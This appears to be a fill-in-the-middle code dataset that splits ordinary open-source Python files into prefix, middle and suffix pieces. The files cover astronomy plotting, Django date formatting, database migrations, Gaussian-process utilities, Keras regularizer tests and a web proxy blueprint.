repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
astroswego/plotypus
|
test/demo.py
|
Python
|
gpl-3.0
| 2,337
| 0.012409
|
from sys import exit
import numpy as np
np.random.seed(4) # chosen by fair dice roll. guaranteed to be random.
from sklearn.linear_model import LinearRegression, LassoCV
from sklearn.pipeline import Pipeline
from plotypus.preprocessing import Fourier
from plotypus.utils import colvec
from plotypus.resources import matplotlibrc
import matplotlib
matplotlib.use('Agg')
from matplotlib import rc_file
rc_file(matplotlibrc)
import matplotlib.pyplot as plt
color = True
def lc(X):
return 10 + np.cos(2*np.pi*X) + 0.1*np.cos(18*np.pi*X)
def main():
X_true = np.linspace(0, 1, 1001)
y_true =
|
lc(X_true)
n_samples = 50
X_sample = np.random.uniform(size=n_samples)
y_sample = lc(X_sample) + np.random.normal(0, 0.1, n_samples)
predictor = Pipeline([('Fourier', Fourier(9)),
('OLS', LinearRegression())])
predictor = predictor.fit(colvec(X_sample), y_sample)
y_pred = predictor.predict(colv
|
ec(X_true))
predictor = Pipeline([('Fourier', Fourier(9)),
('Lasso', LassoCV())])
predictor = predictor.fit(colvec(X_sample), y_sample)
y_lasso = predictor.predict(colvec(X_true))
ax = plt.gca()
signal, = plt.plot(np.hstack((X_true,1+X_true)),
np.hstack((y_true, y_true)),
linewidth=0.66, color='black')
fd, = plt.plot(np.hstack((X_true,1+X_true)),
np.hstack((y_pred, y_pred)),
linewidth=2.5, ls='dashed',
color='darkred' if color else 'black')
lasso, = plt.plot(np.hstack((X_true,1+X_true)),
np.hstack((y_lasso, y_lasso)),
linewidth=3, color='black', ls='dotted')
sc = plt.scatter(np.hstack((X_sample,1+X_sample)),
np.hstack((y_sample, y_sample)),
marker='+', s=20,
color='darkblue' if color else 'black')
plt.legend([signal, sc, fd, lasso],
["True Signal", "Noisy Data", "OLS", "Lasso"],
loc='best')
plt.xlim(0,2)
plt.xlabel('Phase')
plt.ylabel('Magnitude')
plt.title('Simulated Lightcurve Example')
plt.tight_layout(pad=0.1)
plt.savefig('demo.eps')
plt.clf()
if __name__ == '__main__':
exit(main())
|
kikinteractive/kik-python
|
kik/messages/attribution.py
|
Python
|
mit
| 1,812
| 0.001104
|
from kik.resource import Resource
class Attribution(Resource):
"""
Parent class for all attribution types
"""
pass
class CustomAttribution(Attribution):
"""
Att
|
ribution class for custom attributions, as documented at `<https://dev.kik.com/#/docs/messaging#attribution>`_
Usage:
>>> from kik.messages import CustomAttribution, LinkMessage
>>> message = LinkMessage()
>>> message.attribution = CustomAttri
|
bution(
>>> name='A Name',
>>> icon_url='http://foo.bar/anicon'
>>> )
"""
def __init__(self, name=None, icon_url=None):
self.name = name
self.icon_url = icon_url
@classmethod
def property_mapping(cls):
return {
'name': 'name',
'icon_url': 'iconUrl'
}
class PresetAttribution(Attribution):
"""
Attribution class for the preset attribution types (e.g. "gallery" or "camera")
"""
def __init__(self, preset_name):
self.preset_name = preset_name
def to_json(self):
return self.preset_name
class PresetAttributions(object):
"""
List of preset attribution types.
Valid only on :class:`PictureMessage <kik.messages.PictureMessage>` and
:class:`VideoMessage <kik.messages.VideoMessage>`.
:cvar GALLERY: Makes the message appear to be from a user's gallery.
:vartype GALLERY: kik.message.attribution.PresetAttribution
:cvar CAMERA: Makes the message appear to be from a camera.
:vartype CAMERA: kik.message.attribution.PresetAttribution
Usage:
>>> from kik.messages import PresetAttributions, PictureMessage
>>> message = PictureMessage()
>>> message.attribution = PresetAttributions.CAMERA
"""
GALLERY = PresetAttribution('gallery')
CAMERA = PresetAttribution('camera')
|
nitely/Spirit
|
spirit/core/tests/models/__init__.py
|
Python
|
mit
| 341
| 0
|
# -*- cod
|
ing: utf-8 -*-
from .auto_slug import (
AutoSlugPopulateFromModel, AutoSlugModel,
AutoSlugDefaultModel, AutoSlugBadPopulateFromModel
)
from .task_result import TaskResultModel
__all__ = [
'AutoSlugPopulateFromModel', 'AutoS
|
lugModel',
'AutoSlugDefaultModel', 'AutoSlugBadPopulateFromModel',
'TaskResultModel'
]
|
atul-bhouraskar/django
|
django/utils/dateformat.py
|
Python
|
bsd-3-clause
| 10,213
| 0.001175
|
"""
PHP date() style date formatting
See http://www.php.net/date for format strings
Usage:
>>> import datetime
>>> d = datetime.datetime.now()
>>> df = DateFormat(d)
>>> print(df.format('jS F Y H:i'))
7th October 2003 11:39
>>>
"""
import calendar
import datetime
from email.utils import format_datetime as format_datetime_rfc5322
from django.utils.dates import (
MONTHS, MONTHS_3, MONTHS_ALT, MONTHS_AP, WEEKDAYS, WEEKDAYS_ABBR,
)
from django.utils.regex_helper import _lazy_re_compile
from django.utils.timezone import (
_datetime_ambiguous_or_imaginary, get_default_timezone, is_naive,
make_aware,
)
from django.utils.translation import gettext as _
re_formatchars = _lazy_re_compile(r'(?<!\\)([aAbcdDeEfFgGhHiIjlLmMnNoOPrsStTUuwWyYzZ])')
re_escaped = _lazy_re_compile(r'\\(.)')
class Formatter:
def format(self, formatstr):
pieces = []
for i, piece in enumerate(re_formatchars.split(str(formatstr))):
if i % 2:
if type(self.data) is datetime.date and hasattr(TimeFormat, piece):
raise TypeError(
"The format for date objects may not contain "
"time-related format specifiers (found '%s')." % piece
)
pieces.append(str(getattr(self, piece)()))
elif piece:
pieces.append(re_escaped.sub(r'\1', piece))
return ''.join(pieces)
class TimeFormat(Formatter):
def __init__(self, obj):
self.data = obj
self.timezone = None
# We only support timezone when formatting datetime objects,
# not date objects (timezone information not appropriate),
# or time objects (against established django policy).
if isinstance(obj, datetime.datetime):
if is_naive(obj):
self.timezone = get_default_timezone()
else:
self.timezone = obj.tzinfo
@property
def _no_timezone_or_datetime_is_ambiguous_or_imaginary(self):
return (
not self.timezone or
_datetime_ambiguous_or_imaginary(self.data, self.timezone)
)
def a(self):
"'a.m.' or 'p.m.'"
if self.data.hour > 11:
return _('p.m.')
return _('a.m.')
def A(self):
"'AM' or 'PM'"
if self.data.hour > 11:
return _('PM')
return _('AM')
def e(self):
"""
Timezone name.
If timezone information is not available, return an empty string.
"""
if not self.timezone:
return ""
try:
if hasattr(self.data, 'tzinfo') and self.data.tzinfo:
return self.data.tzname() or ''
except NotImplementedError:
pass
return ""
def f(self):
"""
Time, in 12-hour hours and minutes, with minutes left off if they're
zero.
Examples: '1', '1:30', '2:05', '2'
Proprietary extension.
"""
hour = self.data.hour % 12 or 12
minute = self.data.minute
return '%d:%02d' % (hour, minute) if minute else hour
def g(self):
"Hour, 12-hour format without leading zeros; i.e. '1' to '12'"
return self.data.hour % 12 or 12
def G(self):
"Hour, 24-hour format without leading zeros; i.e. '0' to '23'"
return self.data.hour
def h(self):
"Hour, 12-hour format; i.e. '01' to '12'"
return '%02d' % (self.data.hour % 12 or 12)
def H(self):
"Hour, 24-hour format; i.e. '00' to '23'"
return '%02d' % self.data.hour
def i(self):
"Minutes; i.e. '00' to '59'"
return '%02d' % self.data.minute
def O(self): # NOQA: E743, E741
"""
Difference to Greenwich time in hours; e.g. '+0200', '-0430'.
If timezone information is not available, return an empty string.
"""
if sel
|
f._no_timezone_or_datetime_is_ambiguous_or_imaginary:
return ""
seconds = self.Z()
sign = '-' if seconds < 0 else '+'
seconds = abs(seconds)
return "%s%02d%02d" % (sign, seconds // 3600, (seconds // 60) % 60)
def P(self):
"""
Time, in 12-hour hours, minutes and 'a.m.'/
|
'p.m.', with minutes left off
if they're zero and the strings 'midnight' and 'noon' if appropriate.
Examples: '1 a.m.', '1:30 p.m.', 'midnight', 'noon', '12:30 p.m.'
Proprietary extension.
"""
if self.data.minute == 0 and self.data.hour == 0:
return _('midnight')
if self.data.minute == 0 and self.data.hour == 12:
return _('noon')
return '%s %s' % (self.f(), self.a())
def s(self):
"Seconds; i.e. '00' to '59'"
return '%02d' % self.data.second
def T(self):
"""
Time zone of this machine; e.g. 'EST' or 'MDT'.
If timezone information is not available, return an empty string.
"""
if self._no_timezone_or_datetime_is_ambiguous_or_imaginary:
return ""
return str(self.timezone.tzname(self.data))
def u(self):
"Microseconds; i.e. '000000' to '999999'"
return '%06d' % self.data.microsecond
def Z(self):
"""
Time zone offset in seconds (i.e. '-43200' to '43200'). The offset for
timezones west of UTC is always negative, and for those east of UTC is
always positive.
If timezone information is not available, return an empty string.
"""
if self._no_timezone_or_datetime_is_ambiguous_or_imaginary:
return ""
offset = self.timezone.utcoffset(self.data)
# `offset` is a datetime.timedelta. For negative values (to the west of
# UTC) only days can be negative (days=-1) and seconds are always
# positive. e.g. UTC-1 -> timedelta(days=-1, seconds=82800, microseconds=0)
# Positive offsets have days=0
return offset.days * 86400 + offset.seconds
class DateFormat(TimeFormat):
def b(self):
"Month, textual, 3 letters, lowercase; e.g. 'jan'"
return MONTHS_3[self.data.month]
def c(self):
"""
ISO 8601 Format
Example : '2008-01-02T10:30:00.000123'
"""
return self.data.isoformat()
def d(self):
"Day of the month, 2 digits with leading zeros; i.e. '01' to '31'"
return '%02d' % self.data.day
def D(self):
"Day of the week, textual, 3 letters; e.g. 'Fri'"
return WEEKDAYS_ABBR[self.data.weekday()]
def E(self):
"Alternative month names as required by some locales. Proprietary extension."
return MONTHS_ALT[self.data.month]
def F(self):
"Month, textual, long; e.g. 'January'"
return MONTHS[self.data.month]
def I(self): # NOQA: E743, E741
"'1' if daylight saving time, '0' otherwise."
if self._no_timezone_or_datetime_is_ambiguous_or_imaginary:
return ''
return '1' if self.timezone.dst(self.data) else '0'
def j(self):
"Day of the month without leading zeros; i.e. '1' to '31'"
return self.data.day
def l(self): # NOQA: E743, E741
"Day of the week, textual, long; e.g. 'Friday'"
return WEEKDAYS[self.data.weekday()]
def L(self):
"Boolean for whether it is a leap year; i.e. True or False"
return calendar.isleap(self.data.year)
def m(self):
"Month; i.e. '01' to '12'"
return '%02d' % self.data.month
def M(self):
"Month, textual, 3 letters; e.g. 'Jan'"
return MONTHS_3[self.data.month].title()
def n(self):
"Month without leading zeros; i.e. '1' to '12'"
return self.data.month
def N(self):
"Month abbreviation in Associated Press style. Proprietary extension."
return MONTHS_AP[self.data.month]
def o(self):
"ISO 8601 year number matching the ISO week number (W)"
return self.data.isocalendar()[0]
def r(self):
"RFC 5322 formatted date; e.g. 'Thu, 21 Dec 2000 16:01:07 +0200'"
if type(self.data) is datetime.date:
rais
|
rajagopal067/testrepo
|
karma/python/google.py
|
Python
|
apache-2.0
| 258
| 0.031008
|
def glTypesNice(types):
"""Make types into English words"""
return typ
|
es.replace('_',' ').title()
def getLatLong(latitude, longitude):
"""returns the comb
|
ination of latitude and longitude as required for ElasticSearch"""
return latitude+", "+longitude
|
ging/keystone
|
keystone/contrib/oauth2/migrate_repo/versions/009_support_postgresql.py
|
Python
|
apache-2.0
| 3,936
| 0.002541
|
# Copyright (C) 2016 Universidad Politecnica de Madrid
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# Copyright (C) 2014 Universidad Politecnica de Madrid
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sql
from migrate.changeset.constraint import ForeignKeyConstraint
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
meta = sql.MetaData()
meta.bind = migrate_engine
if 'postgres' in str(meta):
# MIGRATION 007
consumer_credentials_table = sql.Table('consumer_credentials_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[consumer_credentials_t
|
able.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_client_id_fkey').drop()
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='con
|
sumer_credentials_oauth2_client_id_fkey', ondelete='CASCADE').create()
# MIGRATION 008
access_token_table = sql.Table('access_token_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[access_token_table.c.consumer_id],
refcolumns=[consumer_oauth2.c.id],
name='access_token_oauth2_consumer_id_fkey').drop()
ForeignKeyConstraint(
columns=[access_token_table.c.consumer_id],
refcolumns=[consumer_oauth2.c.id],
name='access_token_oauth2_consumer_id_fkey', ondelete='CASCADE').create()
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
meta = sql.MetaData()
meta.bind = migrate_engine
if 'postgres' in str(meta):
# MIGRATION 007
consumer_credentials_table = sql.Table('consumer_credentials_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_client_id_fkey', ondelete='CASCADE').drop()
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_client_id_fkey').create()
# MIGRATION 008
access_token_table = sql.Table('access_token_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[access_token_table.c.consumer_id],
refcolumns=[consumer_oauth2.c.id],
name='access_token_oauth2_consumer_id_fkey', ondelete='CASCADE').drop()
ForeignKeyConstraint(
columns=[access_token_table.c.consumer_id],
refcolumns=[consumer_oauth2.c.id],
name='access_token_oauth2_consumer_id_fkey').create()
|
zqfan/leetcode
|
algorithms/74. Search a 2D Matrix/solution.py
|
Python
|
gpl-3.0
| 543
| 0.003683
|
class Solution(object):
d
|
ef searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
m, n = len(matrix), len(matrix[0]) if matrix else 0
l, r = 0, m * n - 1
while l <= r:
mid = (l + r) / 2
num = matrix[mid / n][mid % n]
if target < num:
r = mid - 1
elif target > num:
l = mid + 1
else:
|
return True
return False
|
NICTA/linearizedGP
|
linearizedGP/gputils.py
|
Python
|
gpl-3.0
| 4,822
| 0
|
# linearizedGP -- Implementation of extended and unscented Gaussian processes.
# Copyright (C) 2014 National ICT Australia (NICTA)
#
# This file is part of linearizedGP.
#
# linearizedGP is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# linearizedGP is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with linearizedGP. If not, see <http://www.gnu.org/licenses/>.
""" General utilities useful for Gaussian processes.
Author: Daniel Steinberg (daniel.steinberg@nicta.com.au)
Institute: NICTA
Date: 17 Mar 2014
"""
import numpy as np
import scipy.linalg as la
def jitchol(A):
""" Do cholesky decomposition with a bit of diagonal jitter if needs be.
Aarguments:
A: a [NxN] positive definite symmetric matrix to be decomposed as
A = L.dot(L.T).
Returns:
A lower triangular matrix factor, L, also [NxN].
"""
# Try the cholesky first
try:
cholA = la.cholesky(A, lower=True)
return cholA
except la.LinAlgError as e:
pass
# Now add jitter
D = A.shape[0]
jit = 1e-13
cholA = None
di = np.diag_indices(D)
Amean = A.diagonal().mean()
while jit < 1e-3:
try:
Ajit = A.copy()
Ajit[di] += Amean * jit
cholA = la.cholesky(Ajit, lower=True)
break
except la.LinAlgError as e:
jit *= 10
if cholA is None:
raise la.LinAlgError("Too much jit! " + e.message)
return cholA
def cholsolve(L, b):
""" Solve the system of equations Ax = b with the cholesky A = L*L.T
Arguments:
L: A [NxN] lower triangular cholesky factor.
b: A [NxD] matrix or N vector.
Return:
x: a [NxD] matrix or N vector solution.
"""
return la.solve_triangular(L.T, la.solve_triangular(L, b, lower=True))
def k_fold_CV(X, Y, k=5):
""" Generator to divide a dataset k non-overlapping folds.
Author: Lachlan McCalman
Modified: Daniel Steinberg
Arguments:
X: Input data [DxN] where D is the dimensionality, and N is the
number of samples (X can also be a 1-d vector).
Y: Output data vector of length N.
k: [optional] the number of folds for testing and training.
Returns (per call):
Xr: [D x ((k-1) * N / k)] t
|
raining input data
Yr: [(k-1) * N / k] training output data
Xs: [D x (N / k)] testing input data
Ys: [N / k] testing output data
All of these are randomly split (but non-overlapping per call)
"""
X = np.atleast_2d(X)
random_indices = np.random.permutation(X.shape[1])
X = X[:, random_indices]
Y = Y[random_indices]
X_groups = np.array_split(X, k, axis=1)
Y_groups = np.array_split(Y, k)
for i in range(k):
|
X_s = X_groups[i]
Y_s = Y_groups[i]
X_r = np.hstack(X_groups[0:i] + X_groups[i + 1:])
Y_r = np.concatenate(Y_groups[0:i] + Y_groups[i + 1:])
yield (X_r, Y_r, X_s, Y_s)
def k_fold_CV_ind(nsamples, k=5):
""" Generator to return random test and training indeces for cross fold
validation.
Arguments:
nsamples: the number of samples in the dataset
k: [optional] the number of folds
Returns:
rind: training indices of length nsamples * (k-1)/k
sind: testing indices of length nsamples * 1/k
Each call to this generator returns a random but non-overlapping
split of data.
"""
pindeces = np.random.permutation(nsamples)
pgroups = np.array_split(pindeces, k)
for i in range(k):
sind = pgroups[i]
rind = np.concatenate(pgroups[0:i] + pgroups[i + 1:])
yield (rind, sind)
def logdet(L, dochol=False):
""" Compute the log determinant of a matrix.
Arguments:
L: The [NxN] cholesky factor of the matrix if dochol is False,
otherwise the original [NxN] matrix if dochol is True.
dochol: [optional] do a cholesky decomposition on the input matrix
L if it is not already as cholesky factor.
Returns:
The log determinant (scalar)
"""
if dochol is True:
L = jitchol(L)
return 2 * np.log(L.diagonal()).sum()
|
kevin-coder/tensorflow-fork
|
tensorflow/python/keras/regularizers_test.py
|
Python
|
apache-2.0
| 3,702
| 0.005673
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras regularizers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
DATA_DIM = 5
NUM_CLASSES = 2
class KerasRegularizersTest(keras_parameterized.TestCase):
def create_model(self, kernel_regularizer=None, activity_regularizer=None):
model = keras.models.Sequential()
model.add(keras.layers.Dense(NUM_CLASSES,
kernel_regularizer=kernel_regularizer,
activity_regularizer=activity_regularizer,
input_shape=(DATA_DIM,)))
return model
def get_data(self):
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=10,
test_samples=10,
input_shape=(DATA_DIM,),
num_classes=NUM_CLASSES)
y_train = keras.utils.to_categorical(y_train, NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test, NUM_CLASSES)
return (x_train, y_train), (x_test, y_test)
@parameterized.named_parameters([
('l1', keras.regularizers.l1()),
('l2', keras.regularizers.l2()),
('l1_l2', keras.regularizers.l1_l2()),
])
def test_kernel_regularization(self, regularizer):
with self.cached_session():
(x_train, y_train), _ = self.get_data()
model = self.create_model(kernel_regularizer=regularizer)
model.compile(loss='categorical_crossentropy', optimizer='sgd')
assert len(model.losses) == 1
model.fit(x_train, y_train, batch_size=10,
epochs=1, verbose=0)
@parameterized.named_parameters([
('l1', keras.regularizers.l1()),
('l2', keras.regularizers.l2())
|
,
('l2_zero', keras.regularizers.l2(0.)),
])
@test_util.deprecated_graph_mode_only
def test_activity_regularization(self, regularizer):
with self.cached_session():
(x_train, y_train), _ = self.get_data()
model = self.create_model(activity_regularizer=regularizer)
model.compile(loss='categorical_crossentropy', optimizer='sgd')
assert len(model.losses) == 1
model.fit(x_train, y_train, batch_size=10,
epochs=1, verbose=0)
@ker
|
as_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_zero_regularization(self):
# Verifies that training with zero regularization works.
x, y = np.ones((10, 10)), np.ones((10, 3))
model = testing_utils.get_model_from_layers(
[keras.layers.Dense(3, kernel_regularizer=keras.regularizers.l2(0))],
input_shape=(10,))
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
model.fit(x, y, batch_size=5, epochs=1)
if __name__ == '__main__':
test.main()
|
speedyGonzales/RunTrainer
|
record/models.py
|
Python
|
gpl-3.0
| 244
| 0.02459
|
from django.db import
|
models
# Create your models here.
class Record(models.Model):
description=mode
|
ls.TextField()
distance=models.IntegerField()
reg_date=models.DateTimeField('date published')
reg_user=models.IntegerField()
|
arctelix/django-notification-automated
|
notification/migrations/0004_auto__add_noticequeuebatch.py
|
Python
|
mit
| 7,050
| 0.007801
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'NoticeQueueBatch'
db.create_table('notification_noticequeuebatch', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('pickled_data', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('notification', ['NoticeQueueBatch'])
def backwards(self, orm):
# Deleting model 'NoticeQueueBatch'
db.delete_table('notification_noticequeuebatch')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
|
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('
|
django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'notification.notice': {
'Meta': {'ordering': "['-added']", 'object_name': 'Notice'},
'added': ('django.db.models.fields.DateTimeField', [], {}),
'archived': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'data': ('picklefield.fields.PickledObjectField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notice_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['notification.NoticeType']"}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'unseen': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'notification.noticequeuebatch': {
'Meta': {'object_name': 'NoticeQueueBatch'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pickled_data': ('django.db.models.fields.TextField', [], {})
},
'notification.noticesetting': {
'Meta': {'unique_together': "(('user', 'notice_type', 'medium'),)", 'object_name': 'NoticeSetting'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'medium': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'notice_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['notification.NoticeType']"}),
'send': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'notification.noticetype': {
'Meta': {'object_name': 'NoticeType'},
'default': ('django.db.models.fields.IntegerField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'display': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
'notification.observation': {
'Meta': {'ordering': "['-added']", 'object_name': 'Observation'},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notice_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['notification.NoticeType']"}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'send': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['notification']
|
codeboy/coddy-sitetools
|
sitetools/coddy_api/api_resource.py
|
Python
|
bsd-3-clause
| 1,729
| 0.001157
|
# -*- coding: utf-8 -*-
class ResourceOptions(object):
"""
A configuration class for ``Resource``.
Provides sane defaults and the logic needed to augment these settings with
the internal ``class Meta`` used on ``Resource`` subclasses.
"""
allowed_methods = ['get', 'post', 'put', 'delete', 'patch']
list_allowed_methods = None
detail_allowed_methods = None
# limit = getattr(settings, 'API_LIMIT_PER_PAGE', 20)
urlconf_namespace = None
default_format = 'application/json'
filtering = {}
ordering = []
object_class = None
queryset = None
fields = []
excludes = []
include_resource_uri = True
include_absolute_url = False
always_return_data = False
api_name = None
resource_name = None
resp_message = 'Good!'
resp_script = None
resp_success = True
resp_template = 'adminpanel/ap-test.html'
resp_type = 'tpl'
resp_render_data = None
make_function = None
def __new__(cls, meta=None):
overrides = {}
# Handle overrides.
if meta:
for override_name in dir(meta):
# No internals please.
if not override_name.startswith('_'):
|
overrides[override_name] = getattr(meta, override_name)
allowed_methods = overrides.get('allowed_methods', ['get', 'post', 'put', 'delete', 'patch'])
if overrides.get('list_allowed_methods', None) is None:
overrides['list_allowed_methods'] = allowed_methods
if overrides.get('detail_allowed_methods', None) is None:
overrides['detail_allowed_methods'] = allowed_methods
return object.__new__(type('ResourceOptions', (cls,), overrides))
|
|
labsland/labmanager
|
labmanager/views/proxy.py
|
Python
|
bsd-2-clause
| 7,224
| 0.007198
|
import re
import time
import urlparse
import requests
from flask import Blueprint, Response, abort, stream_with_context, request, url_for, jsonify, current_app
from labmanager.db import db
from labmanager.models import AllowedHost
proxy_blueprint = Blueprint('proxy', __name__)
WHITELIST_REQUEST_HEADERS = ["Accept-Language", "Cache-Control", "Cookie", "If-Modified-Since", "User-Agent", "If-None-Match", "If-Unmodified-Since"]
WHITELIST_RESPONSE_HEADERS = ["ETag", "Content-Type", "Server", "Last-Modified", "Date", "Location"]
unfinished_regexps = [
re.compile(""".* href='[^']*$"""),
re.compile(""".* href="[^"]*$"""),
re.compile(""".* src="[^"]*$"""),
re.compile(""".* src='[^']*$"""),
]
def extract_base_url(url):
parsed = urlparse.urlparse(url)
new_path = parsed.path
# Go to the last directory
if '/' in new_path:
new_path = new_path[:new_path.rfind('/')+1]
messages_file_parsed = urlparse.ParseResult(scheme = parsed.scheme, netloc = parsed.netloc, path = new_path, params = '', query = '', fragment = '')
return messages_file_parsed.geturl()
def make_url_absolute(relative_path, url):
if relative_path.startswith(('http://', 'https://')):
return relative_path
return extract_base_url(url) + relative_path
